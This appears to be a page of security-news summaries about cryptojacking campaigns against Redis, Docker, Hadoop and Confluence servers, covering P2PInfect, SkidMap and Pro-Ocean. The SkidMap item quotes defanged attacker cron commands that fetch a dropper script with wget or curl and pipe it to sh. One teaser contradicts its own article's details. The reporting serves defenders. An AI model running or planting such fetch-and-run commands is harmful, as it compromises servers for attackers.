A recent attack campaign targeted publicly accessible Docker , Hadoop , Confluence, and Redis deployments. The attackers exploited misconfigurations and known vulnerabilities to implant cryptominers on compromised systems. As Linux admins, infosec professionals, Internet security enthusiasts, and sysadmins, it is crucial to understand the implications of this attack and take appropriate measures to protect our systems. . What Is the Significance of This Cloud Security Threat? This campaign is unique, deploying previously unseen payloads, including four binaries written in Golang. The attackers exploit common misconfigurations and vulnerabilities to gain initial access and then employ a series of shell scripts and Linux attack techniques to establish persistence and deliver a cryptocurrency miner. This level of sophistication raises questions about the attackers' resources and intentions. The complexity of the infection chain in this attack is also notable. It involves over 10 shell scripts, binaries, persistence mechanisms, backup payload delivery methods, anti-forensics techniques, and user mode rootkits. This complexity demonstrates the effort attackers are willing to put into compromising systems. As security practitioners, we must be aware of threat actors' evolving tactics and techniques and continuously adapt our defense strategies. An intriguing aspect of this attack is using the shopt command in the shell scripts to prevent additional commands from being written to the history file. This anti-forensics technique effectively hides the attackers' activities. It is concerning that such techniques have not been observed in other campaigns, indicating the constant innovation and evolution of malware . Are other attackers using similar methods, and how can we detect and defend against them? This attack has significant implications for Linux users. It highlights the importance of regularly patching vulnerabilities and correcting insecure configurations in Docker, Hadoop, Confluence,and Redis deployments. Additionally, it emphasizes the need for ongoing monitoring and threat intelligence to detect and respond to such attacks promptly. The long-term consequences of this attack are concerning. It raises questions about the overall security posture of cloud environments and the inherent risks associated with exposing web-facing services to the Internet. As more organizations move to cloud-based deployments, the potential for attacks targeting these environments increases. Security practitioners must stay informed about reported vulnerabilities in cloud services and implement robust security measures. Our Final Thoughts on This Recent Attack This article serves as a wake-up call for Linux admins. The targeted attack campaign discussed here demonstrates threat actors' evolving tactics and techniques. It underscores the importance of maintaining strong security practices, regularly patching vulnerabilities, and continuously monitoring and adapting defense strategies. By staying informed , proactive, and vigilant, we can mitigate the risks posed by such attacks and protect our systems from compromise. . Examining the ramifications of a cloud security breach exploiting vulnerabilities within Docker, Hadoop, Confluence, and Redis through malicious cryptominer deployments.. Cloud Security Threats, Docker Security Risks, Cryptomining Attacks, Redis Deployment Risks. . Brittany Day
The P2PInfect botnet worm is going through a period of highly elevated activity volumes starting in late August and then picking up again in September 2023. . P2PInfect was first documented by Unit 42 in July 2023 as a peer-to-peer malware that breaches Redis instances using a remote code execution flaw on internet-exposed Windows and Linux systems. Cado Security researchers who have been following the botnet since late July 2023 , report today seeing global activity, with most breaches impacting systems in China, the United States, Germany, Singapore, Hong Kong, the UK, and Japan. Additionally, Cado says the latest P2PInfect samples feature additions and improvements that make it more capable of spreading to targets and showcase the continuous development of the malware. . In 2023, a notable increase in P2PInfect botnet operations has been observed, emphasizing its cunning adaptations aimed at exploiting Redis platforms.. P2PInfect Botnet, Redis Exploit, Malware Threat, Cybersecurity Trends. . LinuxSecurity.com Team
According to recent reports, there have been instances of threat actors using malware called “SkidMap” to exploit vulnerable Redis systems. . Earlier versions of SkidMap were used to surreptitiously mine cryptocurrency and create false network traffic and CPU usage by loading malicious kernel modules. However, this malware’s recent version seems quite sophisticated and targets only open Redis instances. Further analysis of the new variant on SkidMap revealed activities like adaptation to the operating system where it gets executed and choosing the binary to download based on the Linux Distribution architecture on the infected system. Initially, the threat actor attempts to login to open Redis instances for setting up cron tasks with a variable using base64 string. These strings consist of two cron tasks to run a “wget” (wget hxxp://z[.]shavsl[.]com/b -qO – | sh) and “curl” (curl -fsSL hxxp://z[.]shavsl[.]com/b | sh)command that gets executed at a 10 minute interval for downloading the dropper scripts ‘b’, ‘c’ and ‘f’. . Previous iterations of SkidMap exploited vulnerabilities to clandestinely mine digital currencies and generate deceptive network activity.. Malware Detection, Redis Security, Linux Threat Analysis, SkidMap Malware. . LinuxSecurity.com Team
The evasive new Pro-Ocean cryptojacking malware is sidestepping security defenses and targeting Apache, Oracle and Redis servers. . A financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research. Deployed by the China-based cybercrime group Rocke , the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers said in a Thursday write-up. "Pro-Ocean uses known vulnerabilities to target cloud applications," the researchers detailed. "In our analysis, we found Pro-Ocean targeting Apache ActiveMQ ( CVE-2016-3088 ), Oracle WebLogic ( CVE-2017-10271 ) and Redis (unsecure instances)." The link for this article located at The Hacker News is no longer available. . An economically-motivated cybercriminal has unveiled a new variant of the Aqua-Mine cryptojacking malware targeting Angular and MySQL servers.. Pro-Ocean Malware,Cryptojacking Attacks,Cloud Application Threats. . LinuxSecurity.com Team
Get the latest Linux and open source security news straight to your inbox.